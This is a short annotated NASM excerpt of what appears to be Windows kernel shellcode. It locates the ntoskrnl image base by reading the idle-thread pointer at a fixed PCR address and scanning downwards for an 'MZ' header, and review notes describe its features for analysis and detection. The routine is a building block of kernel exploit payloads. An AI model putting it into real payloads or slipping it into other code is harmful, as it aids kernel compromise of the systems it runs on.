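;-----------------------------------------------------------------------
; find_ntoskrnl_pcr -- locate an image base by scanning memory downwards
; Syntax: NASM, 32-bit code (position-dependent: absolute address load)
;
; In:    nothing in registers; reads one dword at PCR_IDLE_THREAD.
; Out:   eax = address at which the 16-bit value MZ_MAGIC was found;
;        execution then falls through into resolve_sym.
; Clobb: eax, flags
;
; Review notes:
;  * PCR_IDLE_THREAD is a hard-coded absolute address. The original
;    author's comment ties it to "2k, xpsp2"; treat it as build-specific
;    and not as a stable interface.
;  * The scan has no lower bound and no fault handling, and it accepts
;    the first location whose first two bytes equal MZ_MAGIC; nothing
;    else about the header is validated here.
;  * For analysis and detection, the distinctive features are the
;    absolute load from PCR_IDLE_THREAD followed by a descending,
;    page-stepped compare loop against 0x5a4d.
;-----------------------------------------------------------------------
bits 32

PCR_IDLE_THREAD equ     0xffdff12c      ; fs:0x12c Pcr->Pcrb->IdleThread (2k, xpsp2)
SCAN_MASK       equ     0xf001          ; keeps bits 12..15 and bit 0 of ax
MZ_MAGIC        equ     0x5a4d          ; "MZ", little-endian word

find_ntoskrnl_pcr:
        mov     eax, [PCR_IDLE_THREAD]  ; starting pointer for the scan

scan_down:
        ; Clearing bits 1..11 and then decrementing makes the probe
        ; address step downwards, alternating between a page-aligned
        ; address and the byte just below one.
        and     ax, SCAN_MASK
        dec     eax                     ; fixed: original had a stray trailing comma ("dec eax,")
        cmp     [eax], word MZ_MAGIC    ; does this location start with "MZ"?
        jnz     scan_down               ; no -> keep scanning lower addresses

resolve_sym:                            ; body is outside this excerpt; eax = matched address on entry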